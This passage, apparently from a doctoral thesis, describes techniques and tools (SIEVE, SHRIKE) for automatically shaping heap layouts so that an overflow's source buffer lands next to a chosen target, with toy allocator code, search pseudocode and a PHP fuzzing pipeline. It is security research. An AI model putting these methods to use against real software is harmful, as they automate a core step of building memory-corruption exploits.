to be used, and achieve the reverse ordering of buffers to what would have been achieved if an internal hole had been used. An example of this is shown in Figure 3.8. Assume that the allocation of S must first take place, followed by the allocation of D, and that the allocator in question splits from the end of chunks on internal holes, but splits from the beginning of chunks when dealing with the top of the heap. Despite the order of allocation being fixed we can still achieve a layout where the source is before or after the destination. In outcome ‘A’, the internal hole is not filled and so S is allocated at its end and then D is allocated before it. In outcome ‘B’ we achieve the opposite ordering by first filling the internal hole via the allocation labelled F1, which forces the end of the heap to be used for the allocation, where space is split from the beginning.
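The hole-filling tactic of Figure 3.7 can be replayed against a toy best-fit allocator. The model below is a sketch, not any of the allocators discussed: it carves from the front of holes and falls back to the untouched top of the heap when no hole fits.

```python
class ToyHeap:
    """Toy best-fit allocator: carves from the front of holes, falls back
    to the untouched top of the heap. Illustrative only."""
    def __init__(self, holes, wilderness):
        self.holes = list(holes)      # internal holes: (start, size)
        self.wilderness = wilderness  # next fresh address at the top

    def alloc(self, size):
        fits = [h for h in self.holes if h[1] >= size]
        if fits:
            start, length = min(fits, key=lambda h: h[1])
            self.holes.remove((start, length))
            if length > size:
                self.holes.append((start + size, length - size))
            return start
        addr = self.wilderness
        self.wilderness += size
        return addr

# Two holes of size 32; the source is 32 bytes, the destination 64.
# Without filling, the source is consumed by a hole far from the destination.
heap = ToyHeap(holes=[(0, 32), (100, 32)], wilderness=200)
src, dst = heap.alloc(32), heap.alloc(64)
assert dst - src != 32

# Filling both holes first (F1, F2) forces source and destination together.
heap = ToyHeap(holes=[(0, 32), (100, 32)], wilderness=200)
heap.alloc(32); heap.alloc(32)  # filling allocations F1 and F2
src, dst = heap.alloc(32), heap.alloc(64)
assert dst - src == 32          # destination directly follows the source
```

The two runs correspond to outcomes ‘A’ and ‘B’ of Figure 3.7.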

Hole Creation via Freeing Memory

Given an interaction sequence containing noise, it may be the case that one or more of the noisy allocations ends up consuming space into which we would like to place the source or destination. One solution to this problem can often be to try to create a hole of the exact size of the noisy allocation, so that it is captured and placed out of the way. There are two common ways to achieve this, one of which is to trigger a free of a chunk which, when coalesced with any free chunks that it borders, results in a hole of the desired size being created. Figures 3.9 and 3.10 illustrate this process. In Figure 3.9 an interaction sequence of length 3 allocates the source buffer (labelled ‘S’), a noisy allocation of size 32 (labelled ‘N’), and the destination buffer (labelled ‘D’). The buffer ‘N’ is placed between the source and destination buffer and its contents would be corrupted once an overflow from ‘S’, which aims to corrupt ‘D’, is triggered.

Figure 3.10: Hole creation via free to resolve the issue shown in Figure 3.9.

A solution to the problem is shown in Figure 3.10, where a hole of size 32 is created to capture the intervening allocation in order to achieve the desired layout. The hole is created by first allocating 3 consecutive chunks of the same size as the intervening allocation (32), and then freeing the middle chunk. When the allocation ‘N’ takes place it is then captured by this hole, resulting in the desired outcome of ‘S’ being placed immediately prior to ‘D’.
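The tactic of Figures 3.9 and 3.10 can be replayed against a toy best-fit model. Everything below is illustrative: the allocator is a sketch with no coalescing, and the source and destination sizes are chosen so that the created hole captures only the noisy allocation.

```python
class ToyHeap:
    """Toy best-fit allocator with no coalescing; carves from hole fronts."""
    def __init__(self):
        self.holes, self.top = [], 0

    def alloc(self, size):
        fits = [h for h in self.holes if h[1] >= size]
        if fits:
            start, length = min(fits, key=lambda h: h[1])
            self.holes.remove((start, length))
            if length > size:
                self.holes.append((start + size, length - size))
            return start
        addr, self.top = self.top, self.top + size
        return addr

    def free(self, addr, size):
        self.holes.append((addr, size))

heap = ToyHeap()
a, b, c = heap.alloc(32), heap.alloc(32), heap.alloc(32)
heap.free(b, 32)         # free the middle chunk: a hole of exactly size 32

src = heap.alloc(48)     # 'S': too large for the hole, placed at the top
n = heap.alloc(32)       # noisy allocation 'N': captured by the hole
dst = heap.alloc(48)     # 'D'

assert n == b            # 'N' landed in the hole, out of the way
assert dst == src + 48   # 'S' immediately precedes 'D'
```

The three same-sized allocations followed by a free of the middle one are exactly the preparatory interactions shown in Figure 3.10.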

Hole Creation via Allocating Memory

Another method to create a hole of a particular size, in order to solve the same problem as mentioned in section 3.3.2, is to use one or more allocations to reduce the size of an existing hole to the desired size. Figure 3.11 illustrates the process. An allocation of size 32 is used to reduce the hole of size 64 to a hole of size 32, which then consumes the intervening allocation, labelled ‘N’. The outcome of this is that the source and destination allocations, labelled ‘S’ and ‘D’ respectively, end up adjacent to each other.

Figure 3.11: Hole creation via malloc.
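The scenario of Figure 3.11 can be replayed against the same kind of toy front-carving best-fit model; addresses and sizes below are invented for illustration.

```python
class ToyHeap:
    """Toy best-fit allocator; carves from the front of holes. Illustrative."""
    def __init__(self):
        self.holes, self.top = [], 0

    def alloc(self, size):
        fits = [h for h in self.holes if h[1] >= size]
        if fits:
            start, length = min(fits, key=lambda h: h[1])
            self.holes.remove((start, length))
            if length > size:
                self.holes.append((start + size, length - size))
            return start
        addr, self.top = self.top, self.top + size
        return addr

heap = ToyHeap()
heap.holes = [(0, 64)]  # pre-existing hole of size 64
heap.top = 200          # fresh space starts at 200

heap.alloc(32)          # shrink the size-64 hole to one of exactly size 32

src = heap.alloc(48)    # 'S': does not fit the remaining hole, goes to the top
n = heap.alloc(32)      # 'N': captured by the shrunken hole
dst = heap.alloc(48)    # 'D'

assert n == 32          # 'N' sits in the shrunken hole, out of the way
assert dst == src + 48  # 'S' and 'D' end up adjacent
```

Here a single allocation, rather than a free, does the work of shaping the hole to the exact size of the noisy allocation.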

Hole Filling and Creation with Segregated Storage

The examples used in the previous sections all refer to allocators that do not use segregated storage and are free to arbitrarily locate buffers of different sizes. With segregated storage similar principles apply but, due to the nuances of this mechanism, there are differences in practice. As explained in section 3.2.1, segregated storage will subdivide a region of memory into chunks of a single size, and thus internally within that region only chunks of that size can be adjacent to each other. Thus, to locate two chunks of different sizes adjacent to each other the concepts of filling and creating holes need to be extended from individual chunks to entire regions. The practical outcome of this is that when segregated storage is in use, manipulating the heap layout may require a larger number of interactions with the heap than otherwise, as entire regions of memory need to be filled and emptied.

3.3.3 Challenges

There are several challenges that arise when trying to perform HLM and when trying to construct a general, automated solution. In this section I outline those that are most likely to be significant.

Interaction Noise

Before continuing we first must informally define the concept of an ‘interaction sequence’: an allocator interaction is a call to one of its allocation or deallocation functions, while an interaction sequence is a list of one or more interactions that result from the invocation of a function in the target program’s externally accessible API. As an attacker cannot directly invoke functions in the allocator they must manipulate the heap via the available interaction sequences. As an example, when the create function from Listing 3.1 is called, the resulting interaction sequence consists of three interactions in the form of the three calls to malloc. The destroy function also provides an interaction sequence of length three, in this case consisting of three calls to free. For a given interaction sequence there can be interactions that are beneficial, and assist with manipulation of the heap into a layout that is desirable, and also interactions that are either not beneficial (but benign), or in fact are detrimental to the heap state in terms of the layout one is attempting to achieve. I deem those interactions that are not actively manipulating the heap into a desirable state to be noise³. For example, the create function from Listing 3.1 provides the ability to allocate buffers between 2 and 8 bytes in size by varying the length of the name parameter. However, two other unavoidable allocations also take place – one for the User structure and one for the id. As shown in Figure 3.1, some effort must be invested in crafting the heap layout to ensure that the noisy id allocation is placed out of the way and a name and User structure end up next to each other.
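As a toy analogue of this example (Listing 3.1 itself is not reproduced here, and the structure sizes below are invented for illustration), a single program-level API call expands into an interaction sequence of several allocator interactions, only one of which has an attacker-controlled size:

```python
# Hypothetical sizes: a 16-byte User structure and an 8-byte id accompany
# every name allocation, whose size the attacker controls via name length.

def create(name):
    """One API call -> an interaction sequence of three interactions."""
    return [("malloc", 16),         # User structure (unavoidable noise)
            ("malloc", 8),          # id buffer (unavoidable noise)
            ("malloc", len(name))]  # name buffer (attacker-controlled size)

def destroy():
    """The matching API call yields an interaction sequence of three frees."""
    return [("free", "user"), ("free", "id"), ("free", "name")]

seq = create("bob")
assert len(seq) == 3         # three interactions from a single API call
assert ("malloc", 3) in seq  # the name length controls one allocation size
```

Whether the User and id allocations count as noise depends entirely on the layout being pursued at that point, as the footnote above observes.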

Constraints on Allocator Interactions

An attacker’s access to the allocator is limited by what is allowed by the program they are interacting with. The interface available may limit the sizes that may be allocated, the order in which they may be allocated and deallocated, and the number of times a particular size may be allocated or deallocated. Depending on the heap layout that is desired, these constraints may make the desired layout more complex, or even impossible, to achieve.

Diversity of Allocator Implementations

The open-ended nature of allocator design and implementation means any approach that involves the production of a formal model of a particular allocator is going to be costly and likely limited to a single allocator, and perhaps even a specific version of that allocator. While avrlibc is a mere 350 lines of code, most of the other allocators I consider contain thousands or tens of thousands of lines of code. Their implementations involve complex data structures, loops without fixed bounds, interaction with the operating system and other features that are often terminally challenging for semantics-aware analyses, such as model checking and symbolic execution. A detailed survey of the data structures and algorithms used in allocators is available in [73].

³It is worth noting that whether a particular interaction is noise or not depends entirely on the heap state at the particular point that it occurs, and the outcome that the attacker is trying to achieve. It is not an inherent property of the interaction sequence or the interaction.

Interaction Sequence Discovery

Since in most situations one cannot directly interact with the allocator, an attacker needs to discover what interaction sequences with the allocator can be indirectly triggered via the program’s API. This problem can be addressed separately to the main HLM problem, but it is a necessary first step. In section 3.5.2 I discuss how I solved this problem for the PHP language interpreter.

3.4 Automatic Heap Layout Manipulation

In this section I present my pseudo-random black box search algorithm for HLM, and two evaluation frameworks I have embedded it in to solve heap layout problems on both synthetic benchmarks and real vulnerabilities. The algorithm is theoretically and practically straightforward. There are two strong motivations for initially avoiding complexity. Firstly, there is no existing prior work on automatic HLM and a straightforward algorithm provides a baseline that future, more sophisticated, implementations can be compared against if necessary. Secondly, despite the potential size of the problem, measured by the number of possible combinations of available interactions, for many problem instances there appears to be a large number of functionally equivalent solutions. Since our measure of success is based on the relative positioning of two buffers, large equivalence classes of solutions exist because:

1. Neither the absolute location of the two buffers, nor their relative position to other buffers, matters.

2. The order in which holes are created or filled usually does not matter.

It is often possible to solve a layout problem using significantly differing input sequences. Due to the apparently large number of possible solutions, I propose that a pseudo-random black box search could be effective on a sufficiently large fraction of problem instances to be worthwhile.

To test this hypothesis, and demonstrate its feasibility on real targets, I constructed two systems. The first, described in section 3.4.1, allows for synthetic benchmarks to be constructed with any allocator exposing the standard ANSI interface for dynamic memory allocation. The second system, described in section 3.4.2, is a fully automated HLM system designed to work with the PHP interpreter.

3.4.1 SIEVE: An Evaluation Framework for HLM Algorithms

To allow for the evaluation of search algorithms for HLM across a diverse array of benchmarks I constructed SIEVE. It allows for flexible and scalable evaluation of new search algorithms, or testing existing algorithms on new allocators, new interaction sequences or new heap starting states. There are two components to SIEVE:

1. The SIEVE driver, which is a program that can be linked with any allocator exposing the malloc, free, calloc and realloc functions. As input it takes a file specifying a series of allocation and deallocation requests to make, and produces as output the distance between two particular allocations of interest. Allocations and deallocations are specified via directives of the following forms:

(a) malloc <size> <id>
(b) calloc <nmemb> <size> <id>
(c) realloc <old-id> <size> <id>
(d) free <id>
(e) fst <size>
(f) snd <size>

Each of the first four directives is translated into an invocation of its corresponding memory management function, with the ID parameters providing an identifier which can be used to refer to the returned pointers from malloc, calloc and realloc when they are passed to free or realloc. The final two directives indicate the allocation of the two buffers that we are attempting to place relative to each other. I refer to the addresses that result from the corresponding allocations as addrFst and addrSnd, respectively. After the allocation directives for these buffers have been processed, the value of (addrFst − addrSnd) is produced.

2. The SIEVE framework, which provides a Python API for running HLM experiments. It has a variety of features for constructing candidate solutions, feeding them to the driver and retrieving the resulting distance, which are explained below. This functionality allows one to focus on creating search algorithms for HLM.

Algorithm 1 Find a solution that places two allocations in memory at a specified distance from each other. The integer g is the number of candidates to try, d the required distance, m the maximum candidate size and r the ratio of allocations to deallocations for each candidate.

 1: function Search(g, d, m, r)
 2:   for i ← 0, g − 1 do
 3:     cand ← ConstructCandidate(m, r)
 4:     dist ← Execute(cand)
 5:     if dist = d then
 6:       return cand
 7:   return None

 8: function ConstructCandidate(m, r)
 9:   cand ← InitCandidate(GetStartingState())
10:   len ← Random(1, m)
11:   fstIdx ← Random(0, len − 1)
12:   for i ← 0, len − 1 do
13:     if i = fstIdx then
14:       AppendFstSequence(cand)
15:     else if Random(1, 100) ≤ r then
16:       AppendAllocSequence(cand)
17:     else
18:       AppendFreeSequence(cand)
19:   AppendSndSequence(cand)
20:   return cand

I implemented a pseudo-random search algorithm for HLM on top of SIEVE, and it is shown as Algorithm 1. The m and r parameters are what make the search pseudo-random. While one could potentially use a completely random search, it makes sense to guide it away from candidates that are highly unlikely to be useful due to extreme values for m and r. There are a few points to note on the SIEVE framework’s API in order to understand the algorithm:

• The directives to be passed to the driver are represented in the framework via a Candidate class. The InitCandidate function creates a new Candidate.

• Often one may want to experiment with performing HLM after a number of allocator interactions, representing initialisation of the target application before the attacker can interact, have taken place. SIEVE can be configured with a set of such interactions that can be retrieved via the GetStartingState function. InitCandidate can be provided with the result of GetStartingState (line 9).

• The available interaction sequences impact the difficulty of HLM, i.e. if an attacker can trigger individual allocations of arbitrary sizes they will have more precise control of the heap layout than if they can only make allocations of a single size. To experiment with changes in the available interaction sequences, the user of SIEVE overrides the AppendAllocSequence and AppendFreeSequence⁴ functions to select one of the available interaction sequences and append it to the candidate (lines 16-18).

• The directive to allocate the first buffer of interest is placed at a random offset within the candidate (line 14), with the directive to allocate the second buffer of interest placed at the end (line 19). To experiment with the addition of noise in the allocation of these buffers, the AppendFstSequence and AppendSndSequence functions can be overridden.

• The Execute function takes a candidate, serialises it into the form required by the SIEVE driver, executes the driver on the resulting file and returns the distance output by the driver (line 4).

• As the value output by the driver is (addrFst − addrSnd), to search for a solution placing the buffer allocated first before the buffer allocated second, a negative value can be provided for the d parameter to Search. Providing a positive value will search for a solution placing the buffers in the opposite order. In this manner overflows and underflows can be simulated, with either temporal order of allocation for the source and destination (line 5).
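A compressed, self-contained analogue of Algorithm 1 can be run against a toy allocator model standing in for the SIEVE driver. Everything below is illustrative: all interaction sequences are single 32-byte allocations or frees, and frees release the oldest live buffer, unlike the real framework.

```python
import random

class ToyHeap:
    """Front-carving best-fit heap, no coalescing (illustrative only)."""
    def __init__(self):
        self.holes, self.top = [], 0

    def alloc(self, size):
        fits = [h for h in self.holes if h[1] >= size]
        if fits:
            start, length = min(fits, key=lambda h: h[1])
            self.holes.remove((start, length))
            if length > size:
                self.holes.append((start + size, length - size))
            return start
        addr, self.top = self.top, self.top + size
        return addr

    def free(self, addr, size):
        self.holes.append((addr, size))

def execute(cand):
    """Replay a candidate; return addrFst − addrSnd (deterministic)."""
    heap, live, fst = ToyHeap(), [], None
    for op in cand:
        if op == "fst":
            fst = heap.alloc(32)
        elif op == "snd":
            return fst - heap.alloc(32)
        elif op == "alloc":
            live.append((heap.alloc(32), 32))
        elif op == "free" and live:
            heap.free(*live.pop(0))

def construct_candidate(m, r):
    length = random.randint(1, m)
    fst_idx = random.randrange(length)
    cand = ["fst" if i == fst_idx
            else ("alloc" if random.randint(1, 100) <= r else "free")
            for i in range(length)]
    return cand + ["snd"]

def search(g, d, m, r):
    for _ in range(g):
        cand = construct_candidate(m, r)
        if execute(cand) == d:
            return cand
    return None

random.seed(0)
solution = search(g=2000, d=-32, m=8, r=90)
assert solution is not None and execute(solution) == -32
```

A negative d of −32 asks for the first buffer to sit exactly 32 bytes before the second, mirroring the sign convention of (addrFst − addrSnd) described above.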

The experimental setup used to evaluate pseudo-random search as a means for solving HLM problems on synthetic benchmarks is described in section 3.5.1.

3.4.2 SHRIKE: A HLM System for PHP

For real-world usage the search algorithm must be embedded in a system that solves a variety of other problems in order to allow the search to take place. To evaluate the feasibility of end-to-end automation of HLM I constructed SHRIKE, a HLM system for the PHP interpreter. I chose PHP as it has a number of attributes that make it ideal for experimentation. The PHP interpreter is a large, modern application containing complex functionality. The PHP language is relatively stable and easy to work with in an automated fashion. On top of that, the developers have an open version control system and bug tracker, both of which make it easier to find patched vulnerabilities for the purposes of experimentation.

4The AppendFreeSequence function will detect if there are no allocated buffers to free and redirect to AppendAllocSequence instead.

[Figure: the Interaction Sequence Discovery and Target Structure Discovery components feed, together with the Regression Tests and a Template, into the SEARCH, which outputs a Layout Solution.]

Figure 3.12: Architecture diagram for SHRIKE

Furthermore, PHP is an interesting target from a security point of view as the ability to exploit heap-based vulnerabilities locally in PHP allows attackers to increase their capabilities in situations where the PHP environment has been hardened [83]. The architecture of SHRIKE is shown in Figure 3.12. I implemented the system as three distinct phases:

• A component that identifies fragments of PHP code that provide distinct allocator interaction sequences (Section 3.4.2).
• A component that identifies dynamically allocated structures that may be useful to corrupt or read as part of an exploit, and a means to trigger their allocation (Section 3.4.2).
• A search procedure that pieces together the fragments triggering allocator interactions to produce PHP programs as candidates (Section 3.4.2). The user specifies how to allocate the source and destination, as well as how to trigger the vulnerability, via a template (Section 3.4.2).

The first two components can be run once and the results stored for use during the search. If successful, the output of the search is a new PHP program that manipulates the heap to ensure that when the specified vulnerability is triggered the source and destination buffers are adjacent. To support the functionality required by SHRIKE I implemented an extension for PHP. This extension provides functions that can be invoked from a PHP script to enable a variety of features including recording the allocations that result from invoking a fragment of PHP code, monitoring allocations for the presence of interesting data, and checking the distance between two allocations. I carefully implemented the functionality of this extension to ensure that it does not modify the heap layout of the target program in any way that would invalidate search results. However, all results are validated by executing the solutions in an unmodified version of PHP.

Identifying Available Interaction Sequences

To discover the available interaction sequences it is necessary to construct self-contained fragments of PHP code and determine the allocator interactions each fragment triggers. Correlating code fragments with the resulting allocator interactions is straightforward: SHRIKE instruments the PHP interpreter to record the allocator interactions that result from executing a given fragment. Constructing valid fragments of PHP code that trigger a diverse set of allocator interactions is more involved. SHRIKE resolves the latter problem by implementing a fuzzer for the PHP interpreter that leverages the regression tests that come with PHP, in the form of PHP programs. This idea is based on previous work that used a similar approach for the purposes of vulnerability detection [84, 85]. The tests provide examples of the functions that can be called, as well as the number and types of their arguments. The fuzzer then mutates existing fragments, to produce new fragments with new behaviours. To tune the fuzzer towards the discovery of fragments that are useful for HLM, as opposed to vulnerability discovery, I made the following modifications:

• SHRIKE uses mutations that are intended to produce an interaction sequence that we have not seen before, rather than a crash. For example, fuzzers will often replace integers with values that may lead to edge cases, such as 0, 2^32 − 1, 2^31 − 1 and so on. However, in this context we are interested in triggering unique allocator interactions, and so SHRIKE predominantly mutates tests using integers and string lengths that relate to allocation sizes it has not previously seen.
• The measure of fitness for a generated test is not based on code coverage, as is often the case with vulnerability detection, but is instead based on whether a new allocator interaction sequence is produced, and the length of that interaction sequence.
• SHRIKE discards any fragments that result in the interpreter exiting with an error.
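The first two modifications can be sketched in a few lines of Python. This is an illustrative approximation of the described tuning, not SHRIKE's implementation; the size range and the 8-byte granularity are assumptions chosen for the example.

```python
import random

def mutate_fragment(fragment_args, seen_sizes, max_size=1024):
    """Mutate one integer argument toward an allocation size not yet
    observed, rather than toward crash-prone edge values (0, 2**31 - 1, ...).
    Sizes are assumed to be 8-byte aligned, purely for illustration."""
    unseen = [s for s in range(8, max_size, 8) if s not in seen_sizes]
    target = random.choice(unseen) if unseen else random.randrange(8, max_size)
    i = random.randrange(len(fragment_args))
    new_args = list(fragment_args)
    new_args[i] = target
    return new_args

def fitness(interactions, seen_sequences):
    """A generated test scores only if it triggers an allocator interaction
    sequence not seen before; longer new sequences score higher."""
    key = tuple(interactions)
    if key in seen_sequences:
        return 0
    seen_sequences.add(key)
    return len(interactions)
```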

$image = imagecreatetruecolor(180, 30);
imagestring($image, 5, 10, 8, "Text", 0x00ff00);
$gaussian = array(
    array(1.0, 2.0, 1.0),
    array(2.0, 4.0, 2.0)
);
var_dump(imageconvolution($image, $gaussian, 16, 0));

Listing 3.2: Source for a PHP test program.

imagecreatetruecolor(I, I)
imagestring(R, I, I, I, T, I)
array(F, F, F)
array(R, R)
var_dump(R)
imageconvolution(R, R, I, I)

Listing 3.3: The function fuzzing specifications produced from parsing Listing 3.2.

• SHRIKE favours the shortest, least complex fragments with priority being given to fragments consisting of a single function call.

As an example, let's discuss how the regression test in Listing 3.2 would be used to discover interaction sequences. From the regression test the fuzzing specification shown in Listing 3.3 is automatically produced. Fuzzing specifications indicate the name of functions that can be called, along with the types of their arguments. The types are represented via the letters replacing the concrete arguments: ‘R’ for a resource, ‘I’ for an integer, ‘F’ for a float and ‘T’ for text. SHRIKE then begins to fuzz the discovered functions, using the specifications to ensure the correct types are provided for each argument. For example, the code fragments $x = imagecreatetruecolor(1, 1), $x = imagecreatetruecolor(1, 2), $x = imagecreatetruecolor(1, 3) etc. might be created and executed to determine what, if any, allocator interactions they trigger. The output of this stage is a mapping from fragments of PHP code to a summary of the allocator interaction sequences that occur as a result of executing that code. The summary includes the number and size of any allocations, and whether the sequence triggers any frees.
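The argument-abstraction step that turns Listing 3.2 into Listing 3.3 can be sketched as a small Python function. The classification rules below (variable → R, integer or hex literal → I, float → F, anything else → T) are inferred from the description above; the naive comma split does not handle nested calls.

```python
import re

def abstract_args(call):
    """Reduce a concrete PHP call to a fuzzing specification by replacing
    each argument with a type letter: R (resource/variable), I (integer),
    F (float), T (text). Nested calls are not handled in this sketch."""
    name, argstr = re.match(r"\s*(\w+)\((.*)\)\s*$", call).groups()
    letters = []
    for arg in argstr.split(","):
        arg = arg.strip()
        if arg.startswith("$"):
            letters.append("R")
        elif re.fullmatch(r"-?\d+\.\d+", arg):
            letters.append("F")
        elif re.fullmatch(r"0x[0-9a-fA-F]+|-?\d+", arg):
            letters.append("I")
        else:
            letters.append("T")
    return f"{name}({', '.join(letters)})"
```

For instance, `abstract_args('imagestring($image, 5, 10, 8, "Text", 0x00ff00)')` yields the `imagestring(R, I, I, I, T, I)` line of Listing 3.3.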

Automatic Identification of Target Structures

In most programs there is a diverse set of dynamically allocated structures that one could corrupt or read to violate some security property of the program. These targets may be program-specific, such as values that guard a sensitive path; or they may be somewhat generic, such as a function pointer. Identifying these targets, and how to dynamically allocate them, can be a difficult manual task in itself. To further automate the process I implemented a component that, as with the fuzzer, splits the PHP tests into standalone fragments and then observes the behaviour of these fragments when executed. If the fragment dynamically allocates a buffer and writes what appears to be a pointer to that buffer, SHRIKE considers the buffer to be an interesting corruption target and stores the fragment. The user can indicate in the template which of the discovered corruption targets to use, or the system can automatically select one.
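The "looks like a pointer" heuristic can be approximated in a few lines. The sketch below is a simplified model, not SHRIKE's instrumentation: it flags a buffer as a potential corruption target if its first word falls inside some live allocation, i.e. it appears to hold a heap pointer.

```python
def looks_like_target(allocations, memory):
    """allocations: list of (addr, size) live buffers; memory: dict mapping
    a buffer's address to the first word stored in it. Return the addresses
    of buffers whose first field appears to be a heap pointer."""
    ranges = [(a, a + s) for a, s in allocations]
    targets = []
    for addr, _ in allocations:
        word = memory.get(addr)
        if word is None:
            continue
        # A value landing inside a live allocation is treated as a pointer.
        if any(lo <= word < hi for lo, hi in ranges):
            targets.append(addr)
    return targets
```

For example, a buffer at 0x1000 whose first word is 0x2010 would be flagged when another allocation spans 0x2000-0x2040, matching the "structures that have pointers as their first field" criterion used later in the evaluation.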

Specifying Candidate Structure

Different vulnerabilities require different setup in order to trigger, e.g. the initialisation of required objects or the invocation of multiple functions. To avoid hard-coding vulnerability-specific information in the candidate creation process, SHRIKE allows for the creation of candidate templates that define the structure of a candidate. A template is a normal PHP program with the addition of directives starting with #X-SHRIKE5. The template is processed by SHRIKE and the directives inform it how candidates should be produced and what constraints they must satisfy to solve the HLM problem. The supported directives are:

• HEAP-MANIP: Indicates a location where SHRIKE can insert heap-manipulating sequences. The sizes argument is an optional list of integers indicating the allocation sizes that the search should be restricted to.
• RECORD-ALLOC: Indicates that SHRIKE should inject code to record the address of an allocation and associate it with the provided id argument. The offset argument indicates the allocation to record. Offset 0 is the very next allocation, offset 1 the one after that, and so on.
• REQUIRE-DISTANCE: Indicates that SHRIKE should inject code to check the distance between the pointers associated with the provided IDs. Assuming x and y are the pointers associated with idx and idy respectively, then if (x − y = dist) SHRIKE will report the result to the user, indicating this particular HLM problem has been solved. If (x − y ≠ dist) then the candidate will be discarded and the search will continue.

A sample template for CVE-2013-2110, a heap-based buffer overflow in PHP, is shown in Listing 3.4. In section 3.5.3 I explain how this template was used in the construction of a control-flow hijacking exploit for PHP.

5As the directives begin with a ‘#’ they will be interpreted by the normal PHP interpreter as a comment and thus can be run in both the modified interpreter and an unmodified one.
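To make the template mechanism concrete, the following Python sketch parses a hypothetical template into verbatim lines and directives. Both the template contents and the directive operand grammar (HEAP-MANIP sizes..., RECORD-ALLOC offset id, REQUIRE-DISTANCE idx idy dist) are illustrative guesses at the shape implied by the descriptions above, not the actual grammar accepted by SHRIKE.

```python
SHRIKE_PREFIX = "#X-SHRIKE"

def parse_template(src):
    """Split a template into ('verbatim', line) and
    ('directive', name, operands) nodes."""
    nodes = []
    for line in src.splitlines():
        stripped = line.strip()
        if stripped.startswith(SHRIKE_PREFIX):
            parts = stripped[len(SHRIKE_PREFIX):].split()
            nodes.append(("directive", parts[0], [int(x) for x in parts[1:]]))
        else:
            nodes.append(("verbatim", line))
    return nodes

# A hypothetical template: PHP setup code interleaved with directives.
template = """\
$quota = 20;           // hypothetical setup code
#X-SHRIKE HEAP-MANIP 8 16
#X-SHRIKE RECORD-ALLOC 0 1
trigger_vuln();        // hypothetical vulnerability trigger
#X-SHRIKE RECORD-ALLOC 0 2
#X-SHRIKE REQUIRE-DISTANCE 1 2 16
"""
```

Because the directives start with '#', the same file runs unmodified under a stock PHP interpreter, which simply treats them as comments.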

Listing 3.4: Exploit template for CVE-2013-2110

Search

The search in SHRIKE is outlined in Algorithm 2. It takes in a template, parses it and then constructs and executes PHP programs until a solution is found or the execution budget expires. Candidate creation is shown in the Instantiate function. Its first argument is a representation of the template as a series of objects. The objects represent either SHRIKE directives or normal PHP code and are processed as follows:

• The HEAP-MANIP directive is handled via the GetHeapManipCode function (line 12). The database, constructed as described in section 3.4.2, is queried for a series of PHP fragments, where each fragment allocates or frees one of the sizes specified in the sizes argument to the directive in the template. If no sizes are provided then all available fragments are considered. If multiple fragments exist for a given size then selection is biased towards fragments with less noise. Between 1 and m fragments are selected and returned. The r parameter controls the ratio of fragments containing allocations to those containing frees.
• The RECORD-ALLOC directive is handled via the GetRecordAllocCode function (line 14). A PHP fragment is returned consisting of a call to a function in our extension for PHP that associates the specified allocation with the specified ID.
• The REQUIRE-DISTANCE directive is handled via the GetRequireDistanceCode function (line 16). A PHP fragment is returned with two components. Firstly, a call to a function in our PHP extension that queries the distance between the pointers associated with the given IDs. Secondly, a conditional statement that prints a success indicator if the returned distance equals the distance parameter.

Algorithm 2 Solve the HLM problem described in the provided template t. The integer g is the number of candidates to try, d the required distance, m the maximum number of fragments that can be inserted in place of each HEAP-MANIP directive, and r the ratio of allocation to deallocation fragments used in place of each HEAP-MANIP directive.

 1: function Search(t, g, m, r)
 2:     spec ← ParseTemplate(t)
 3:     for i ← 0, g − 1 do
 4:         cand ← Instantiate(spec, m, r)
 5:         if Execute(cand) then
 6:             return cand
 7:     return None

 8: function Instantiate(spec, m, r)
 9:     cand ← NewPHPProgram()
10:     while n ← Iterate(spec) do
11:         if IsHeapManip(n) then
12:             code ← GetHeapManipCode(n, m, r)
13:         else if IsRecordAlloc(n) then
14:             code ← GetRecordAllocCode(n)
15:         else if IsRequireDistance(n) then
16:             code ← GetRequireDistanceCode(n)
17:         else
18:             code ← GetVerbatim(n)
19:         AppendCode(cand, code)
20:     return cand

• All code that is not a SHRIKE directive is included in each candidate verbatim (line 18).

The Execute function (line 5) converts the candidate into a valid PHP program and invokes the PHP interpreter on the result. It checks for the success indicator printed by the code inserted to handle the REQUIRE-DISTANCE directive. If that is detected then the solution program is reported. Listing 1 in the appendix shows a solution produced from the template in Listing 3.4.
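A minimal runnable rendering of Algorithm 2's structure is given below. This is a sketch, not SHRIKE: the RECORD-ALLOC, REQUIRE-DISTANCE and verbatim branches are collapsed into a single pass-through case, and the bias toward low-noise fragments is omitted. The r parameter biases fragment selection toward allocations, as in the algorithm.

```python
import random

def instantiate(spec, fragments, m, r):
    """Walk the parsed template and replace each HEAP-MANIP node with
    between 1 and m randomly chosen fragments, picking an allocation
    fragment with probability r and a free fragment otherwise. All other
    node kinds are emitted as-is in this simplified sketch."""
    cand = []
    for kind, payload in spec:
        if kind == "heap-manip":
            for _ in range(random.randint(1, m)):
                pool = fragments["alloc"] if random.random() < r else fragments["free"]
                cand.append(random.choice(pool))
        else:
            cand.append(payload)
    return cand

def search(spec, fragments, execute, g, m, r):
    """Mirror Algorithm 2's Search: try up to g candidates, returning the
    first one the caller-supplied execute function accepts."""
    for _ in range(g):
        cand = instantiate(spec, fragments, m, r)
        if execute(cand):
            return cand
    return None
```

In SHRIKE the execute callback corresponds to serialising the candidate to a PHP program, running the interpreter, and checking for the success indicator printed by the REQUIRE-DISTANCE code.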

3.5 Experiments and Evaluation

The research questions I address are as follows:

• RQ1: What factors most significantly impact the difficulty of the heap layout manipulation problem in a deterministic setting?

• RQ2: Is pseudo-random search an effective approach to heap-layout manipulation?
• RQ3: Can heap layout manipulation be automated effectively for real-world programs?

I conducted two sets of experiments. Firstly, to investigate the fundamentals of the problem I used SIEVE to construct a set of synthetic benchmarks involving differing combinations of heap starting states, interaction sequences, source and destination sizes, and allocators. I chose the tcmalloc (v2.6.1), dlmalloc (v2.8.6) and avrlibc (v2.0) allocators for experimentation. These allocators have significantly different implementations and are used in many real world applications. An important difference between the allocators used for evaluation is that tcmalloc (and PHP) make use of segregated storage, while dlmalloc and avrlibc do not. In short, for small allocation sizes (e.g. less than 4KB) segregated storage pre-segments runs of pages into chunks of the same size and will then only place allocations of that size within those pages. Thus, only allocations of the same, or similar, sizes may be adjacent to each other, except for the first and last allocations in the run of pages which may be adjacent to the last or first allocation from other size classes.

Secondly, to evaluate the viability of my search algorithm on real world applications I ran SHRIKE on 30 different layout manipulation problems in PHP. All experiments were carried out on a server with 80 Intel Xeon E7-4870 2.40GHz cores and 1TB of RAM, utilising 40 concurrent analysis processes.
